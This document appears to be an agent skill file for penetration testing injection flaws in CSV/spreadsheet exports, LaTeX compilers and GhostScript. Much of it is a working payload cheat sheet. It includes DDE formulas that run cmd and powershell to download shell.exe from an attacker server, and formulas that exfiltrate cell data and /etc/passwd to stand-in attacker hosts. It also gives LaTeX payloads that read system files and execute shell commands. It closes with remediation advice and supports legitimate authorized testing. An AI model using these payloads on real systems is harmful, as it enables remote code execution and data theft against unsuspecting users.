Formula/CSV/LaTeX/GhostScript Injection Testing

A comprehensive skill for testing injection vulnerabilities in spreadsheet formulas, LaTeX documents, and GhostScript PDF processing.

When to Use This Skill

Use this skill when:

• Testing CSV export functionality for formula injection
• Analyzing document generation features that use LaTeX
• Assessing PDF processing pipelines using GhostScript
• Reviewing file upload endpoints that process spreadsheets or documents
• Investigating data exfiltration risks through spreadsheet formulas
• Testing for Remote Code Execution (RCE) via document processing

Safety Notice

⚠️ Authorized Testing Only: These techniques should only be used in authorized security assessments. Never test systems you don't own or have explicit permission to assess.

Formula/CSV Injection

Understanding the Vulnerability

When user input is reflected inside CSV files that will be opened by Excel or similar spreadsheet applications, attackers can inject formulas that execute when the file is opened.

Detection Methodology

1. Identify CSV export endpoints - Look for download links, export buttons, or API endpoints returning CSV data
2. Test with formula prefixes - Submit inputs starting with

   =

   ,

   +

   ,

   -

   ,

   @

   , or

   tab

3. Check for DDE payloads - Test Dynamic Data Exchange injection vectors
4. Verify Excel warnings - Note that modern Excel shows warnings for external content

Test Payloads

Basic Formula Injection

=10+20
=SUM(1+9)
=cmd|' /C calc'!A0

DDE Payloads (Remote Code Execution)

DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1

Hyperlink Injection (Data Exfiltration)

=HYPERLINK("http://attacker.com/exfil?data=","Click here")
=HYPERLINK("http://attacker.com/"&A1,"Link")

LibreOffice Calc Exploitation

LibreOffice can read local files and exfiltrate data:

='file:///etc/passwd'#$passwd.A1
=WEBSERVICE(CONCATENATE("http://<attacker IP>:8080/",('file:///etc/passwd'#$passwd.A1)))
=WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),".<attacker domain>"))

Google Sheets OOB Exfiltration

=IMPORTXML(CONCAT("http://<attacker IP:Port>/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")
=IMPORTFEED(CONCAT("http://<attacker IP:Port>/123.txt?v=", CONCATENATE(A2:E2)))
=IMPORTHTML(CONCAT("http://<attacker IP:Port>/123.txt?v=", CONCATENATE(A2:E2)),"table",1)
=IMAGE("https://<attacker IP:Port>/images/test.png")

LaTeX Injection

Understanding the Vulnerability

LaTeX injection occurs when user input is processed by LaTeX compilers (pdflatex, xelatex, etc.) without proper sanitization. The severity depends on shell escape settings.

Shell Escape Modes

--no-shell-escape

\write18{}

--shell-restricted

--shell-escape

Detection Methodology

1. Identify LaTeX processing - Look for PDF generation, document compilation, or LaTeX rendering
2. Test with LaTeX commands - Submit inputs containing

   \input

   ,

   \write18

   ,

   \include

3. Check error messages - LaTeX errors can reveal processing details
4. Test file operations - Attempt to read/write files via LaTeX

File Read Payloads

\input{/etc/passwd}
\include{password}
\lstinputlisting{/usr/share/texmf/web2c/texmf.cnf}
\usepackage{verbatim}
\verbatiminput{/etc/passwd}

Read Single Line File

\newread\file
\openin\file=/etc/issue
\read\file to\line
\text{\line}
\closein\file

Read Multi-line File

\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
    \read\file to\fileline
    \text{\fileline}
\repeat
\closein\file

File Write Payloads

\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\closeout\outfile

Command Execution Payloads

\immediate\write18{env > output}
\input{output}

\input{|"/bin/hostname"}
\input{|"extractbb /etc/passwd > /tmp/b.tex"}

\documentclass{article}\begin{document}
\immediate\write18{mpost -ini "-tex=bash -c (id;uname${IFS}-sm)>/tmp/pwn" "x.mp"}
\end{document}

Alternative Commands (when mpost restricted)

\input{|"bibtex8 --version > /tmp/b.tex"}
\input{|"kpsewhich pdfetex.ini > /tmp/b.tex"}
\input{|"kpsewhich -expand-var=$HOSTNAME > /tmp/b.tex"}
\input{|"kpsewhich --var-value=shell_escape_commands > /tmp/b.tex"}

Base64 Encoding (for special characters)

\immediate\write18{env | base64 > test.tex}
\input{test.tex}

Cross-Site Scripting via LaTeX

\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}

GhostScript Injection

Understanding the Vulnerability

GhostScript is a PDF interpreter that can execute arbitrary code if user input is not properly sanitized. Common in PDF processing, conversion, and rendering pipelines.

Detection Methodology

1. Identify GhostScript usage - Look for PDF processing, conversion tools, or image extraction
2. Test with GhostScript operators - Submit inputs containing

   system()

   ,

   exec()

3. Check version - Older versions have more vulnerabilities
4. Test file operations - Attempt to read/write files

Common Attack Vectors

• PDF metadata injection
• JavaScript execution in PDFs
• External file inclusion
• Command execution via GhostScript operators

Reference Resources

• GhostScript Overview
• GhostScript Security

Testing Workflow

Step 1: Reconnaissance

1. Identify all file processing endpoints
2. Determine file types accepted (CSV, LaTeX, PDF)
3. Map data flow from input to output
4. Check for sanitization or validation

Step 2: Payload Testing

1. Start with benign payloads to confirm processing
2. Escalate to file read operations
3. Test command execution if file operations work
4. Attempt data exfiltration via OOB channels

Step 3: Verification

1. Check for command execution indicators
2. Monitor network traffic for exfiltration
3. Verify file creation/modification
4. Document all findings

Step 4: Reporting

1. Include proof-of-concept payloads
2. Explain impact and risk
3. Provide remediation recommendations
4. Note affected endpoints and parameters

Remediation Recommendations

Formula/CSV Injection

• Escape formula characters - Prefix cells with single quote (

  '

  )
• Use non-Excel formats - Consider JSON, XML, or plain text
• Validate input - Reject inputs starting with

  =

  ,

  +

  ,

  -

  ,

  @

• Add warnings - Include security notices in exported files

LaTeX Injection

• Use

  --no-shell-escape

  - Disable shell escape by default
• Sanitize input - Remove or escape LaTeX commands
• Use restricted mode -

  --shell-restricted

  if commands needed
• Sandbox processing - Run LaTeX in isolated environments

GhostScript Injection

• Update GhostScript - Keep to latest version
• Disable dangerous operators - Use

  -dSAFER

  mode
• Validate input - Sanitize all user-provided content
• Sandbox processing - Use containerization or VMs

Helper Scripts

Use the bundled scripts to generate test payloads:

• scripts/generate_csv_payloads.py

  - Generate CSV injection payloads

• scripts/generate_latex_payloads.py

  - Generate LaTeX injection payloads

• scripts/test_injection.py

  - Test for injection vulnerabilities

Run scripts with

--help

References

• CSV Injection Payloads
• Data Exfiltration via Formula Injection
• Hacking with LaTeX
• LaTeX Injection Cheatsheet
• GhostScript Overview
• Pwning Coworkers via LaTeX